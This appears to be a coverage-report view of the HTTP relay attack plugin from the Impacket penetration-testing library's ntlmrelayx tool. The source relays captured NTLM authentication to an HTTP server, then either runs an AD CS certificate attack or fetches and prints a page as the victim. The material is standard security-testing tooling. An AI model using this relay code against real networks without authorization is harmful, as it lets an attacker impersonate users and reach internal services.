Hide keyboard shortcuts

Hot-keys on this page

r m x p   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1# Impacket - Collection of Python classes for working with network protocols. 

2# 

3# SECUREAUTH LABS. Copyright (C) 2018 SecureAuth Corporation. All rights reserved. 

4# 

5# This software is provided under a slightly modified version 

6# of the Apache Software License. See the accompanying LICENSE file 

7# for more information. 

8# 

9# Description: 

10# HTTP Attack Class 

11# HTTP protocol relay attack 

12# 

13# Authors: 

14# Alberto Solino (@agsolino) 

15# Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com) 

16# Ex Android Dev (@ExAndroidDev) 

17 

18from impacket.examples.ntlmrelayx.attacks import ProtocolAttack 

19from impacket.examples.ntlmrelayx.attacks.httpattacks.adcsattack import ADCSAttack 

20 

21PROTOCOL_ATTACK_CLASS = "HTTPAttack" 

22 

23 

24class HTTPAttack(ProtocolAttack, ADCSAttack): 

25 """ 

26 This is the default HTTP attack. This attack only dumps the root page, though 

27 you can add any complex attack below. self.client is an instance of urrlib.session 

28 For easy advanced attacks, use the SOCKS option and use curl or a browser to simply 

29 proxy through ntlmrelayx 

30 """ 

31 PLUGIN_NAMES = ["HTTP", "HTTPS"] 

32 

33 def run(self): 

34 

35 if self.config.isADCSAttack: 

36 ADCSAttack._run(self) 

37 else: 

38 # Default action: Dump requested page to file, named username-targetname.html 

39 # You can also request any page on the server via self.client.session, 

40 # for example with: 

41 self.client.request("GET", "/") 

42 r1 = self.client.getresponse() 

43 print(r1.status, r1.reason) 

44 data1 = r1.read() 

45 print(data1)